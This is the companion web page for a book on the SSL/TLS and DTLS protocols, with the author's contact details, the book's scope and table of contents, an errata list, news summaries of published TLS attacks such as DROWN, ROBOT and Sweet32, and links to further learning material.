SSL and TLS: Theory and Practice, Second Edition

E-Mail: rolf.oppliger@esecurity.ch
Phone: +41 79 654 84 37

Aims and Scope

This book provides a comprehensive overview and discussion of the SSL/TLS and DTLS protocols, and specifically addresses their security. This includes the most recent attacks against the SSL/TLS protocols that have made press headlines (e.g., BEAST, CRIME, Lucky 13, POODLE, FREAK, Logjam, ... ). The book also addresses related topics, like TLS extensions, firewall traversal, as well as public key certificates and Internet PKI.

Target Audience

The book is intended for anyone who has a basic understanding of cryptography and TCP/IP networking, and who wants to learn more about the SSL/TLS and DTLS protocols and their proper use. It speaks to both theorists and practitioners.

Table of Contents

Preface
1. Introduction
2. SSL Protocol
3. TLS Protocol
4. DTLS Protocol
5. Firewall Traversal
6. Public Key Certificates and Internet PKI
7. Concluding Remarks
Registered TLS Cipher Suites
Padding Oracle Attacks
Abbreviations and Acronyms
About the Author
Index

Reviews

Errata List

• Page 23, Figure 2.1: The caption should start with "The SSL protocol with ..." (instead of "The SSL protocol with ...")
• Page 36, Table 2.4: The key exchange algorithm associated with SSL_DH_anon_EXPORT_WITH_DES40_CBC_SHA is "DH_anon_EXPORT" (instead of "DH_anon")
• Page 69, line 10 from the bottom: The note in brackets should read as "referring to a Finished message" (instead of "referring to a CertificateVerify message")
• Page 83, line 2: Insert "minus one" after "... refer to the padding length"
• Page 85, line 8: The last term in the square brackets should read as C_{i-1}[k-1] (instead of C_{n-1}[k-1])
• Page 166, lines 2 and 9 in paragraph 2: The overline of C should also comprise the Delta
• page 167, line 8: "the" must be replaced with "then"
• Page 248, 9th line from the bottom: The note in brackets should read as "that has been encrypted with e" (instead of d)
• Page 248, 8th line from the bottom: The note in brackets should read as "using the respective private key d" (instead of "using the same key d")
• Page 250, 3rd line after Algorithm B.1: "interated" must be replaced with "iterated"

News

• In April 2022, the DTLS 1.3 specification was published in RFC 9147 and submitted to the Internet Standards Track.
• In March 2021, the IETF officially deprecated TLS version 1.0 and 1.1, as well as DTLS version 1.0 in RFC 8996.
• In March/April 2019, Nir Drucker and Shay Gueron released a paper in which they identify a security vulnerability in the PSK feature of TLS 1.3 that can be exploited in a new reflection attack called Selfie.
• After the release of the POODLE attack in 2014 (cf. Section 2.4), it was found that several TLS implementations did not properly validate the padding bytes and were therefore also susceptible to the POODLE attack - now called POODLE TLS. In March 2019, Craig Young found and posted two related attacks: Zombie POODLE and GOLDENDOODLE.
• In November 2018, Eyal Ronen et al. published a paper in which they show that most TLS implementations in use today are still vulnerable to Bleichenbacher-like padding oracle attacks. The term coined to refer to these attacks is Cache-like ATtacks, and hence the acronym used here is CAT (equal to the respective research project name).
• At the 25rd ACM Conference on Computer and Communications Security (CCS) that will take place in October 2018, Eyal Ronen, Kenneth G. Paterson, and Adi Shamir will present three new types of attack that are similar to Lucky 13, and that are still feasible even though some pseudo constant time countermeasures are put in place. A preprint of the paper is available in the Cryptology ePrint Archive.
• In August 2018, the TLS 1.3 specification was published in RFC 8446 and submitted to the Internet Standards Track.
• In December 2017, Hanno Böck, Juraj Somorovsky, and Craig Young published a paper in which they showed that many currently deployed products and sites are still vulnerable to the Bleichenbacher attack. The respective attack is called ROBOT, and acronym standing for Return Of Bleichenbacher's Oracle Threat.
• At the 23rd ACM Conference on Computer and Communications Security (CCS) that took place in October 2016, Karthikeyan Bhargavan and Gaëtan Leurent presented a new attack - called Sweet32 - that exploits collisions on block ciphers with a relatively short block length, such as 3DES used in HTTPS.
• At BlackHat 2016, Mathy Vanhoef and Tom Van Goethem demonstrated possibilities to mount compression-related attacks, such as CRIME or BREACH, entirely in a modern browser that supports a specific API, i.e., the ServiceWorkers API, without any network sniffing or MITM deployment. The respective attack has been named HTTP Encrypted Information can be Stolen through TCP-Windows (HEIST).
• On May 25, 2016, Radu Caragea published a paper in which he decribed forensic techniques to read out a server's master key from the memory of a virtual machine executed in a hypervisor. This work has an impact on the security that can be achieved if the operation of an SSL/TLS-enabled Web server is outsourced, for example, to an external cloud provider.
• On May 3, 2016, Juraj Somorovsky announced a vulnerability in OpenSSL (CVE-2016-2107) that was introduced to fix Lucky 13, and that can be exploited in a new padding oracle attack. Filippo Valsorda later coined the term LuckyMinus20 (or LuckyNegative20) to refer to it.
• On March 1, 2016, a group of researchers announced a new attack against (all versions of) the TLS protocol. The attack is called DROWN, an acronmy standing for Decrypting RSA with Obsolete and Weakened eNcryption. It is basically a cross-protocol attack that exploits the fact that the usual countermasure against the Bleichenbacher attack (cf. Section 2.4 on top of page 81) does not properly work in an SSLv2 setting (due to the way the master secret is generated combined with the fact that this secret can be as small as 40 bits in exportable cipher suites). So if a server supports SSLv2 and uses the same RSA key for TLS, then the DROWN attack can be used to actually mount a variation of the Bleichenbacher attack. There are two versions of the attack: A general DROWN attack and a special DROWN attack. While the general DROWN attack is not particularly efficient, the special DROWN attack is highly efficient and devastating. To defeat the attack, it is necessary to remove support for SSLv2 on the server side entirely.
• At the 2016 Internet Society's Network and Distributed System Security Symposium (NDSS 2016), Karthikeyan Bhargavan and Gaëtan Leurent presented some transcript collision attacks against cryptographic hash functions that are yet known to have weaknesses regarding their collision resistance (e.g., MD5 and SHA-1) but are still used in TLS (as well as many other Internet security protocols, such as IKE and SSH). The attacks are collectively called SLOTH, an acronym standing for Security Loss due to the use of Obsolete and Truncated Hash constructions.
• In November 2015, Martin R. Albrecht and Kenneth G. Paterson released a technical report in which they explain how a variant of the Lucky 13 attack - named Lucky Microseconds - can still be mounted against Amazon's new implementation of the TLS protocol (i.e., s2n) even though protections against Lucky 13 had been put in place.
• In August 2015 (24th USEXIX Security Symposium), two research groups presented papers on how to actually break RC4 in a TLS setting (paper1, paper2). The results of the second paper are also known as the RC4 NOMORE attack.

Additional Material

• On June 24, 2021, Rolf Oppliger gave a Webinar for the Information Security Society Switzerland (ISSS) on TLS 1.3 (the slides are available here).
• David Wong has created an animated TLS 1.3 specification that is more readable and accessible than the purely text-based RFC 8446.
• An interactive illustration of a TLS 1.3 protocol execution transcript is available here (a similar illustration for TLS 1.2 is available here).
• A TLS 1.3 protocol execution transcript has been captured with Wireshark (TLS13Handshake.pcapng).
• A TLS 1.2 protocol execution transcript has been captured with Wireshark (TLS12Handshake.pcapng) and is discussed in a new Appendix C that will be included in the next edition of the book.
• Ivan Ristić has compiled a Web page that provides a comprehensive history of the most important events that shaped the SSL/TLS and PKI ecosystem.